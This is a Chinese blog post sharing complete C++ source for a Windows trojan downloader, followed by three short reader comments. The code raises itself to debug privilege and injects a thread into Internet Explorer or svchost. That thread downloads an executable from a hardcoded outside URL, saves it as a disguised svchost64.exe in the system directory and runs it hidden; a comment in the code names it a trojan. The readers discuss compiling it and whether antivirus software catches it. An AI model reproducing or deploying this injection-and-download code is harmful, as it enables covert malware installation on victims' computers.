C++ win32 downloader

来源:Child Process of The Universe

#include "stdafx.h"
#include "stdio.h"
#include "string.h"
#include <windows.h>
#include <wininet.h>
#include "tlhelp32.h"
#pragma comment(lib,"wininet.lib")

/***********************************************/
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd,          //定义 ShellExecute
                                                LPCTSTR lpOperation,
                                                LPCTSTR lpFile,
                                                LPCTSTR lpParameters,
                                                LPCTSTR lpDiretory,
                                                INT nShowCmd);

typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText,   //定义MessageBoxA原型
                                         LPCTSTR lpszCaption, UINT nType);

// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定义CreateFileA
                                            LPSECURITY_ATTRIBUTES,
                                            DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD,     //定义WriteFile
                                         LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject );    //定义CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR);    //定义GetModuleHandle
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定义GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR);       //定义LoadLibraryA

// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent,  //定义InternetOpen
                                                IN DWORD dwAccessType,
                                                IN LPCTSTR lpszProxyByName,
                                                IN LPCTSTR lpszProxyByPass,
                                                IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定义InternetOpenUrl
                                                   IN LPCTSTR lpszUrl,
                                                   IN LPCTSTR lpszHeaders OPTIONAL,
                                                   IN DWORD dwHeadersLength,
                                                   IN DWORD dwFlags,
                                                    IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定义InternetReadFile
                                                    IN LPVOID lpBuffer,
                                                    IN DWORD dwNumberOfBytesToRead,
                                                    OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定义InternetCloseHandle

typedef struct tag_Inject             // define a structure to copy to distance process
                        {
                        fun_GetModuleHandle GetModuleHandle;
                        fun_GetProcAddress GetProcAddress;
                        fun_LoadLibrary LoadLibrary;
                        char szKernel[32];
                        char szUser[32];
                        char szNet[32];
                        char szShell[32];
                        char szMessageBox[32];
                        char szInternetOpen[32];
                        char szInternetOpenUrl[MAX_PATH];
                        char szInternetReadFile[128];
                        char szInternetCloseHandle[32];
                        char szCreateFile[32];
                        char szWriteFile[32];
                        char szCloseHandle[32];
                        char szShellExecute[32];
                        char szHeader[16];
                        char szInterFlag[32];
                        char szOpenFlag[10];
                        char szUrlAddr[MAX_PATH];
                        char szUrlAddr1[MAX_PATH];
                        char szFilePath[MAX_PATH];
                        char szFilePath1[MAX_PATH];
                        }Inject;

/***************************************/

/************************************************/
static BOOL ThreadProc(Inject* Inject_info)
{
    HMODULE hKernel32, hUser32, hWininet, hShell32;  //模块句柄

    fun_InternetOpen j_InternetOpen;           //定义函数指针
    fun_InternetOpenUrl j_InternetOpenUrl;
    fun_InternetReadFile j_InternetReadFile;
    fun_InternetCloseHandle j_InternetCloseHandle;
    fun_CreateFile j_CreateFile;
    fun_WriteFile j_WriteFile;
    fun_CloseHandle j_CloseHandle;
    fun_MessageBox j_MessageBox;
    fun_ShellExecute j_ShellExecute;

    hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel);  //隐式加载DLL
    if (NULL == hKernel32)                              //加载失败
    {
        hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel);          //显示加载
        if (NULL == hKernel32)                                      //显示加载失败
        {
            return FALSE;
        }
    }

    hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
    if (NULL == hUser32)
    {
        hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
        if (NULL == hUser32)
        {
            return FALSE;
        }
    }

    hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
    if (NULL == hWininet)
    {
        hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
        if (NULL == hWininet)
        {
            return FALSE;
        }
    }

    hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
    if (NULL == hShell32)
    {
        hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
        if (NULL == hShell32)
        {
            return FALSE;
        }
    }

    j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet,                    //绑定 InternetOpen
                                                                    Inject_info->szInternetOpen);
    j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet,              //绑定 InternetOpenUrl
                                                                         Inject_info->szInternetOpenUrl);
    j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet,            //绑定 InternetReadFile
                                                                            Inject_info->szInternetReadFile);
    j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet,      //绑定 InternetCloseHandle
                                                                                Inject_info->szInternetCloseHandle);

    j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32,                       //绑定 CreateFile
                                                                Inject_info->szCreateFile);
    j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32,                         //绑定 WriteFile
                                                                Inject_info->szWriteFile);
    j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32,                     //绑定 CloseHandle
                                                                Inject_info->szCloseHandle);
    j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32,                         //绑定 MessageBox
                                                                Inject_info->szMessageBox);
    j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32,                    //绑定 ShellExecute
                                                                    Inject_info->szShellExecute);
    HINTERNET hNet, hFile;                                                                      //定义网络句柄和文件句柄

    hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
                            NULL, NULL, 0);                                                     //打开网络并返回网络句柄
    if (NULL == hNet)                                                                           //打开网络出错
    {
        return FALSE;
    }

    hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
                                strlen(Inject_info->szHeader),
                                INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0);              //打开指定的URL并返回请求的URL的资源句柄
    if (NULL == hFile)                                                                          //打开网络地址出错
    {
        return FALSE;
    }

    char buff[1024];                                                                            //数据传输缓存
    DWORD dwRead,                                                                               //字节数
            dwWritten = NULL;                                                                   //实际写入的字节数

    HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE,      //始终创建文件
                                        0, NULL, CREATE_ALWAYS, 0 ,NULL);
    if (NULL == hCreateFile)                                                                    //创建文件出错!
    {
        return FALSE;
    }
    while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
    {
        if (0 == dwRead)                 //如果传输出错,退出
            break;
        j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL);  //将读取到的数据写入本地文件

    }
    j_InternetCloseHandle(hNet);                             //关闭网络句柄
    j_InternetCloseHandle(hFile);                           //关闭网络文件句柄
    j_CloseHandle(hCreateFile);                            //关闭本地文件句柄

    j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //运行木马

    return TRUE;
}

static void AddressFlag(void)
{
}
/****************************************************************************************************************/

/***************************************************************************************/
/*                       提升当前进程的权限到 DEBUG                                    */
/***************************************************************************************/

/****************************************************************************************************************/
BOOL ImprovePrivilege()                                         //将进程提权
{
    HANDLE hToken = NULL ;                              //令牌句柄
    BOOL bRet = FALSE;                                      //返回执行结果
    TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}};   //填充权限令牌结构

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);   //查询是否具有调试权限
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //打开进程权限令牌
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0);    //为进程申请 DEBUG 权限
    bRet = (GetLastError() == ERROR_SUCCESS);                //检测是否执行成功
    return bRet;
}
/****************************************************************************************************************/

/***************************************************************************************/
/*                       得到IExplore.exe的进程ID                                      */
/***************************************************************************************/

/****************************************************************************************************************/
DWORD Get_ProcID()
{
    char* strProc = new char[256];
    HANDLE hSnap;                                                       //快照句柄
    PROCESSENTRY32 ppe;                                                 //进程结构信息

    hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);            //创建系统进程快照

    if (!ImprovePrivilege())                                            //提升本进程权限
    {
        return FALSE;
    }
    ppe.dwSize = sizeof( PROCESSENTRY32 );                              //计算结构大小
    Process32First( hSnap, &ppe );                                      //找到第一个进程
    while ( 1 )          //判断系统中的进程是否有IE的进程
    {
        strcpy(strProc, ppe.szExeFile); //转存
        strProc = strlwr(strProc);  //转换为小写
        if (0 == strcmp(strProc, "iexplore.exe"))//判断是否是 IE
        {
            return ppe.th32ProcessID;
        }
        else if (0 == strcmp(strProc, "svchost.exe"))//判断是否是 svchost
        {
            return ppe.th32ProcessID;
        }
        if ( !Process32Next( hSnap, &ppe ))
        {
            break;
        }
    }
    CloseHandle( hSnap );
    return 0;
}
/*************************************/

/*************************************************************************************/
/*      将 ThreadProc 函数以插入线程的形式在浏览器进程中运行                         */
/*************************************/

/*************************************/
BOOL InsertThread()
{
    char szSystemRoot[MAX_PATH];
    PDWORD pdwRemote = NULL;  //申请远程空间地址
    const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//计算代码长度

    Inject *InjectRemote = NULL; //将Inject复制到远程进程空间中去
    DWORD dwThread = NULL,
        dwOut = NULL,
         dwProc = Get_ProcID();
    HANDLE hProc = NULL;
    const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //需要的内存块大小

    Inject Inject_stru = {NULL, NULL, NULL,
                            "kernel32.dll",
                            "user32.dll",
                            "wininet.dll",
                            "shell32.dll",
                            "MessageBoxA",
                            "InternetOpenA",
                            "InternetOpenUrlA",
                            "InternetReadFile",
                            "InternetCloseHandle",
                            "CreateFileA",
                            "WriteFile",
                            "CloseHandle",
                            "ShellExecuteA",
                            "Accept: */*\r\n\r\n",
                            "RookIE/1.0",
                            "wba",
                            "http://www.hf-hx.com/music/x.exe",
                            ""};  //初始化结构

    GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //得到系统目录
    strcat(szSystemRoot, "\\svchost64.exe"); //构造文件名(含路径)
    strcpy(Inject_stru.szFilePath, szSystemRoot); //传递给Inject 结构中的szFilePaht

    HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
    Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, "GetModuleHandleA");//绑定GetModuleHandle
    Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, "GetProcAddress"); //绑定GetProcAddress
    Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA");//绑定LoadLibrary

    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc);     //以最高权限打开浏览器进程
    if (NULL == hProc)
    {
        return FALSE;
    }

    pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //在远程空间中申请内存块
    if (NULL == pdwRemote)
    {
        return FALSE;
    }

    if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //向远程进程写入功能代码
    {
        return FALSE;
    }

    InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
    if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut))  //向远程线程写入结构数据
    {
        return FALSE;
    }

    if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //创建进程线程
    {
        return FALSE;
    }

    return TRUE;
}
/******************************************/

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    InsertThread();
    return 0;
}

相关日志

楼被抢了 3 层了... 抢座Rss 2.0或者 Trackback

  • s.sakura

    什么东东““ 看不懂`

  • hellboy

    我用VC6.0编译老是出现错误,用C++ BUILDER 编译后,可以生成程序,但是运行后,SVCHOST。EXE直接挂掉。不知道是什么原因,估计是我的VC6.0的安装有问题,

  • kipass

    插线程已经不行了,虽然过多数防火墙,但大部分有主防的杀软都会拦截这个动作..

发表评论